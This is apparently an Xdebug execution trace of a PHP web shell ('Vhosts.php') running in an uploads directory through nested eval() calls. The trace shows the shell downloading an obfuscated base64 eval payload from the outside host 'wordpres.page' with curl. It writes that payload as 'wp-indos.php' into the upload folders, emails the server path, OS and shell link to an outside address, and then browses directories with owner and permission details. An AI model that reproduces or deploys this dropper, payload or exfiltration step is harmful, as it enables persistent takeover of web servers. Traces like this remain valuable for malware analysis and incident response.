5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 98 $dir = '/var/www/html/uploads/data'
6 56 0 0.006452 577696 is_dir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 99 1 '/var/www/html/uploads/data'
6 56 1 0.006467 577728
6 56 R TRUE
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 100 $directories[] = '/var/www/html/uploads/data'
6 57 0 0.006492 578064 expandDirectories 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 101 1 '/var/www/html/uploads/data'
6 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 95 $directories = []
7 58 0 0.006521 578064 scandir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 96 1 '/var/www/html/uploads/data'
7 58 1 0.006546 578592
7 58 R [0 => '.', 1 => '..', 2 => 'trace-1676238152.9243.xt.gz']
6 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 98 $dir = '/var/www/html/uploads/data/trace-1676238152.9243.xt.gz'
7 59 0 0.006579 578640 is_dir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 99 1 '/var/www/html/uploads/data/trace-1676238152.9243.xt.gz'
7 59 1 0.006597 578704
7 59 R FALSE
6 57 1 0.006611 578088
6 57 R []
6 60 0 0.006623 578088 array_merge 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 101 2 [0 => '/var/www/html/uploads/data'] []
6 60 1 0.006639 578528
6 60 R [0 => '/var/www/html/uploads/data']
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 101 $directories = [0 => '/var/www/html/uploads/data']
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 98 $dir = '/var/www/html/uploads/prepend.php'
6 61 0 0.006680 578152 is_dir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 99 1 '/var/www/html/uploads/prepend.php'
6 61 1 0.006696 578176
6 61 R FALSE
5 52 1 0.006709 577480
5 52 R [0 => '/var/www/html/uploads/data']
5 62 0 0.006725 577480 array_merge 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 101 2 [0 => '/var/www/html/uploads'] [0 => '/var/www/html/uploads/data']
5 62 1 0.006741 577920
5 62 R [0 => '/var/www/html/uploads', 1 => '/var/www/html/uploads/data']
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 101 $directories = [0 => '/var/www/html/uploads', 1 => '/var/www/html/uploads/data']
4 48 1 0.006772 576600
4 48 R [0 => '/var/www/html/uploads', 1 => '/var/www/html/uploads/data']
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 80 $directories = [0 => '/var/www/html/uploads', 1 => '/var/www/html/uploads/data']
4 63 0 0.006802 576600 http_get 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 81 1 'https://wordpres.page/txt/lamer.txt'
5 64 0 0.006816 576600 curl_init 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 108 1 'https://wordpres.page/txt/lamer.txt'
5 64 1 0.006833 577544
5 64 R resource(10) of type (curl)
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 108 $im = resource(10) of type (curl)
5 65 0 0.006861 577512 curl_setopt 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 109 3 resource(10) of type (curl) 19913 1
5 65 1 0.006896 577608
5 65 R TRUE
5 66 0 0.006910 577512 curl_setopt 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 110 3 resource(10) of type (curl) 78 10
5 66 1 0.006925 577608
5 66 R TRUE
5 67 0 0.006938 577512 curl_setopt 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 111 3 resource(10) of type (curl) 52 1
5 67 1 0.006953 577608
5 67 R TRUE
5 68 0 0.006965 577512 curl_setopt 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 112 3 resource(10) of type (curl) 42 0
5 68 1 0.006980 577608
5 68 R TRUE
5 69 0 0.006993 577512 curl_exec 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 113 1 resource(10) of type (curl)
5 69 1 0.397780 626696
5 69 R '<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
4 63 1 0.398591 625752
4 63 R '<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 81 $css = '<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
4 70 0 0.398722 625752 preg_match 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 84 2 '#wp-content#' '/var/www/html/uploads'
4 70 1 0.398927 625816
4 70 R 0
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 86 $css_file = '/var/www/html/uploads/wp-indos.php'
4 71 0 0.398958 625816 fopen 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 87 2 '/var/www/html/uploads/wp-indos.php' 'w'
4 71 1 0.399014 626368
4 71 R resource(11) of type (stream)
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 87 $open_css = resource(11) of type (stream)
4 72 0 0.399045 626296 fwrite 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 88 2 resource(11) of type (stream) '<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
4 72 1 0.399142 626360
4 72 R 47731
4 73 0 0.399157 626296 fclose 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 89 1 resource(11) of type (stream)
4 73 1 0.399174 625872
4 73 R TRUE
4 74 0 0.399187 625840 preg_match 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 84 2 '#wp-content#' '/var/www/html/uploads/data'
4 74 1 0.399204 625904
4 74 R 0
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 86 $css_file = '/var/www/html/uploads/data/wp-indos.php'
4 75 0 0.399230 625840 fopen 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 87 2 '/var/www/html/uploads/data/wp-indos.php' 'w'
4 75 1 0.399263 626392
4 75 R resource(12) of type (stream)
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 87 $open_css = resource(12) of type (stream)
4 76 0 0.399294 626296 fwrite 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 88 2 resource(12) of type (stream) '<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
4 76 1 0.399386 626360
4 76 R 47731
4 77 0 0.399401 626296 fclose 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 89 1 resource(12) of type (stream)
4 77 1 0.399417 625872
4 77 R TRUE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 117 $kime = 'byhero44@gmail.com'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 118 $baslik = 'wsoff 2023'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 119 $EL_MuHaMMeD = 'Dosya Yolu : /var/www/html\r\n'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 120 $EL_MuHaMMeD .= 'Server Admin : webmaster@localhost\r\n'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 121 $EL_MuHaMMeD .= 'Server isletim sistemi : Apache/2.4.52 (Ubuntu)\r\n'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 122 $EL_MuHaMMeD .= 'Shell Link : http://localhost/uploads/Vhosts.php\r\n'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 123 $EL_MuHaMMeD .= 'Avlanan Site : localhost\r\n'
4 78 0 0.399529 626064 mail 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 124 3 'byhero44@gmail.com' 'wsoff 2023' 'Dosya Yolu : /var/www/html\r\nServer Admin : webmaster@localhost\r\nServer isletim sistemi : Apache/2.4.52 (Ubuntu)\r\nShell Link : http://localhost/uploads/Vhosts.php\r\nAvlanan Site : localhost\r\n'
4 78 1 0.400406 626160
4 78 R FALSE
4 79 0 0.400430 626064 headhtml 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 662 0
4 79 1 0.400451 626064
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 804 $directory = '/var/www/'
4 80 0 0.400475 626064 displayFolderForm 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 811 0
4 80 1 0.400491 626064
4 81 0 0.400498 626064 directoryList 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 813 1 '/var/www/'
5 82 0 0.400514 626064 is_dir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 422 1 '/var/www/'
5 82 1 0.400537 626080
5 82 R TRUE
5 83 0 0.400552 626040 opendir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 424 1 '/var/www/'
5 83 1 0.400572 626320
5 83 R resource(13) of type (stream)
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 424 $dh = resource(13) of type (stream)
5 84 0 0.400601 626288 readdir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 427 1 resource(13) of type (stream)
5 84 1 0.400623 626360
5 84 R '..'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 427 $file = '..'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 430 $link = '..'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 432 $fileDisplayName = '..'
5 85 0 0.400672 626360 filepermission 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 435 1 '/var/www/..'
6 86 0 0.400687 626360 fileperms 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 550 1 '/var/www/..'
6 86 1 0.400703 626400
6 86 R 16877
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 550 $perms = 16877
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 567 $info = 'd'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 580 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 581 $info .= 'w'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 584 $info .= 'x'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 587 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 588 $info .= '-'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 591 $info .= 'x'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 594 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 595 $info .= '-'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 598 $info .= 'x'
5 85 1 0.400834 626400
5 85 R 'drwxr-xr-x'
5 87 0 0.400847 626360 substr 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 435 3 'drwxr-xr-x' 0 1
5 87 1 0.400864 626456
5 87 R 'd'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 438 $formId = '..d'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 448 $file = '../'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 451 $link = '<form id="..d" action="" method="get"> <input type="hidden" name="directory" value="/var/www/../"> <a href="#" onclick="document.getElementById(\'..d\').submit();"> .. </a></form>'
5 88 0 0.400920 626608 getFileSize 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 465 2 '/var/www/' '../'
6 89 0 0.400935 626648 filesize 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 607 1 '/var/www/../'
6 89 1 0.400951 626688
6 89 R 4096
5 88 1 0.400964 626608
5 88 R 4096
5 90 0 0.400978 626608 getFileLastModTime 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 466 2 '/var/www/' '../'
6 91 0 0.400993 626648 filemtime 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 613 1 '/var/www/../'
6 91 1 0.401007 626688
6 91 R 1674329859
6 92 0 0.401020 626608 date 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 613 2 'F d Y H:i:s.' 1674329859
6 92 1 0.401080 629000
6 92 R 'January 21 2023 14:37:39.'
5 90 1 0.401098 628928
5 90 R 'January 21 2023 14:37:39.'
5 93 0 0.401113 628712 filepermission 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 467 1 '/var/www/../'
6 94 0 0.401127 628712 fileperms 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 550 1 '/var/www/../'
6 94 1 0.401142 628752
6 94 R 16877
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 550 $perms = 16877
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 567 $info = 'd'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 580 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 581 $info .= 'w'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 584 $info .= 'x'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 587 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 588 $info .= '-'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 591 $info .= 'x'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 594 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 595 $info .= '-'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 598 $info .= 'x'
5 93 1 0.401275 628752
5 93 R 'drwxr-xr-x'
5 95 0 0.401290 628672 getFileOwner 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 468 2 '/var/www/' '../'
6 96 0 0.401305 628712 fileowner 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 619 1 '/var/www/../'
6 96 1 0.401319 628752
6 96 R 0
6 97 0 0.401332 628672 posix_getpwuid 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 619 1 0
6 97 1 0.401363 629472
6 97 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 619 $fileOwnerInfo = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
5 95 1 0.401426 628704
5 95 R 'root'
5 98 0 0.401441 628672 getFileGroup 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 469 2 '/var/www/' '../'
6 99 0 0.401456 628712 filegroup 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 626 1 '/var/www/../'
6 99 1 0.401471 628752
6 99 R 0
6 100 0 0.401483 628672 posix_getgrgid 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 626 1 0
6 100 1 0.401509 629328
6 100 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 626 $fileGroupInfo = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
5 98 1 0.401552 628704
5 98 R 'root'
5 101 0 0.401566 628672 readdir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 427 1 resource(13) of type (stream)
5 101 1 0.401582 628744
5 101 R 'html'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 427 $file = 'html'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 430 $link = 'html'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 432 $fileDisplayName = 'html'
5 102 0 0.401646 628456 filepermission 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 435 1 '/var/www/html'
6 103 0 0.401660 628456 fileperms 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 550 1 '/var/www/html'
6 103 1 0.401677 628496
6 103 R 16895
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 550 $perms = 16895
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 567 $info = 'd'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 580 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 581 $info .= 'w'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 584 $info .= 'x'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 587 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 588 $info .= 'w'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 591 $info .= 'x'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 594 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 595 $info .= 'w'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 598 $info .= 'x'
5 102 1 0.401825 628496
5 102 R 'drwxrwxrwx'
5 104 0 0.401839 628456 substr 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 435 3 'drwxrwxrwx' 0 1
5 104 1 0.401855 628552
5 104 R 'd'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 438 $formId = 'htmld'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 448 $file = 'html/'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 451 $link = '<form id="htmld" action="" method="get"> <input type="hidden" name="directory" value="/var/www/html/"> <a href="#" onclick="document.getElementById(\'htmld\').submit();"> html </a></form>'
5 105 0 0.401921 628672 getFileSize 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 465 2 '/var/www/' 'html/'
6 106 0 0.401937 628712 filesize 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 607 1 '/var/www/html/'
6 106 1 0.401953 628752
6 106 R 4096
5 105 1 0.401966 628672
5 105 R 4096
5 107 0 0.401980 628672 getFileLastModTime 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 466 2 '/var/www/' 'html/'
6 108 0 0.401995 628712 filemtime 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 613 1 '/var/www/html/'
6 108 1 0.402009 628752
6 108 R 1676238152
6 109 0 0.402022 628672 date 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 613 2 'F d Y H:i:s.' 1676238152
6 109 1 0.402054 629000
6 109 R 'February 12 2023 16:42:32.'
5 107 1 0.402069 628928
5 107 R 'February 12 2023 16:42:32.'
5 110 0 0.402084 628712 filepermission 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 467 1 '/var/www/html/'
6 111 0 0.402098 628712 fileperms 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 550 1 '/var/www/html/'
6 111 1 0.402113 628752
6 111 R 16895
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 550 $perms = 16895
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 567 $info = 'd'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 580 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 581 $info .= 'w'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 584 $info .= 'x'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 587 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 588 $info .= 'w'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 591 $info .= 'x'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 594 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 595 $info .= 'w'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 598 $info .= 'x'
5 110 1 0.402240 628752
5 110 R 'drwxrwxrwx'
5 112 0 0.402254 628672 getFileOwner 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 468 2 '/var/www/' 'html/'
6 113 0 0.402269 628712 fileowner 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 619 1 '/var/www/html/'
6 113 1 0.402283 628752
6 113 R 0
6 114 0 0.402295 628672 posix_getpwuid 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 619 1 0
6 114 1 0.402320 629472
6 114 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 619 $fileOwnerInfo = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
5 112 1 0.402371 628704
5 112 R 'root'
5 115 0 0.402385 628672 getFileGroup 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 469 2 '/var/www/' 'html/'
6 116 0 0.402401 628712 filegroup 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 626 1 '/var/www/html/'
6 116 1 0.402415 628752
6 116 R 0
6 117 0 0.402427 628672 posix_getgrgid 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 626 1 0
6 117 1 0.402450 629328
6 117 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 626 $fileGroupInfo = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
5 115 1 0.402493 628704
5 115 R 'root'
5 118 0 0.402507 628672 readdir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 427 1 resource(13) of type (stream)
5 118 1 0.402522 628744
5 118 R '.'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 427 $file = '.'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 430 $link = '.'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 432 $fileDisplayName = '.'
5 119 0 0.402572 628456 filepermission 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 435 1 '/var/www/.'
6 120 0 0.402587 628456 fileperms 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 550 1 '/var/www/.'
6 120 1 0.402603 628496
6 120 R 16895
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 550 $perms = 16895
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 567 $info = 'd'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 580 $info .= 'r'
